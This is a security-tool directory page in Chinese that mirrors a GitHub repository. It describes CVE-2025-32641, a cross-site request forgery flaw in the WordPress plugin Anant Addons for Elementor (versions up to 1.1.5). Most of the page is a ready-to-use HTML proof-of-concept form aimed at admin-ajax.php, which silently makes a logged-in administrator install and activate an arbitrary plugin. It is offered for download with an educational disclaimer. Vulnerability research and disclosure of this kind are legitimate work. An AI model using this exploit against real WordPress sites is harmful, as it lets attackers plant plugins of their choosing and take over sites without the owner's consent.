Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-32641 — Anant Addons for Elementor <= 1.1.5 CSRF到任意插件安装漏洞 | Kitploit
工具/GitHubGitHub/nxploited/cve-2025-32641
漏洞分析漏洞利用Web应用程序漏洞利用Web安全论文与研究学习与教育
GitHubnxploited/cve-2025-32641

CVE-2025-32641

Anant Addons for Elementor <= 1.1.5 CSRF到任意插件安装漏洞

查看仓库
11年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🛡️ Anant Addons for Elementor <= 1.1.5 - CSRF 至任意插件安装

🧨 CVE-2025-32641

**跨站请求伪造(CSRF)**漏洞存在于 anantaddons 的 Anant Addons for Elementor 中
此问题影响版本:从未知版本到 1.1.5

  • 基础评分:9.6(严重)
  • CVSS 向量:CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

🔍 描述

此漏洞允许未认证的攻击者在管理员不知情的情况下,代表已登录的管理员执行任意插件安装。
通过构造恶意页面或表单,攻击者可以静默地强制管理员从 WordPress 仓库安装并激活任意插件。


💥 影响

  • ✅ 任意插件安装
  • ✅ 插件激活
  • ❌ 无 nonce 或 CSRF 保护
  • ✅ 可通过简单的 HTML 页面利用
  • ⚠️ 需要管理员已登录并打开恶意页面

🧪 HTML 概念验证(PoC)

root@kitploit:~
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Anant Addons for Elementor <= 1.1.5 CSRF Exploit</title>
  <style>
    body {
      background-color: #111;
      color: #0f0;
      font-family: monospace;
      padding: 40px;
    }
    h1 {
      color: #ff0055;
      font-size: 24px;
      border-bottom: 1px solid #555;
      padding-bottom: 10px;
    }
    .box {
      background-color: #222;
      border: 1px solid #444;
      padding: 20px;
      margin-top: 20px;
    }
    input[type="submit"] {
      background-color: #ff0055;
      color: #fff;
      border: none;
      padding: 10px 20px;
      font-weight: bold;
      cursor: pointer;
    }
    input[type="submit"]:hover {
      background-color: #cc0044;
    }
  </style>
</head>
<body>

  <h1>
    Anant Addons for Elementor <= 1.1.5<br>
    CSRF to Arbitrary Plugin Installation Vulnerability
  </h1>

  <div class="box">
    <p># By: <strong>Nxploited | Khaled Alenazi</strong></p>
    <p># Type: <strong>CSRF (No Nonce Validation)</strong></p>
    <p># Impact: <strong>Unauthenticated attacker can force admin to install and activate arbitrary WordPress plugins</strong></p>
  </div>

  <form action="http://192.168.100.74:888/wordpress/wp-admin/admin-ajax.php?action=install_act_plugin" method="POST" class="box">
    <input type="hidden" name="plugs" value="hello-dolly">
    <p>🎯 Click the button below to trigger plugin installation (admin session must be active):</p>
    <input type="submit" value="Exploit Now">
  </form>

</body>
</html>


🎯 当已登录的管理员点击此表单(或该表单在恶意页面中自动提交)时,插件将被静默安装并激活。


⚠️ 免责声明

本仓库及内容仅供教育和安全研究目的使用。
作者对因不当使用此信息而导致的任何滥用或损害概不负责。
请始终在您拥有或已获得明确测试许可的系统上执行测试。


作者:Nxploited | Khaled ALenazi

下载工具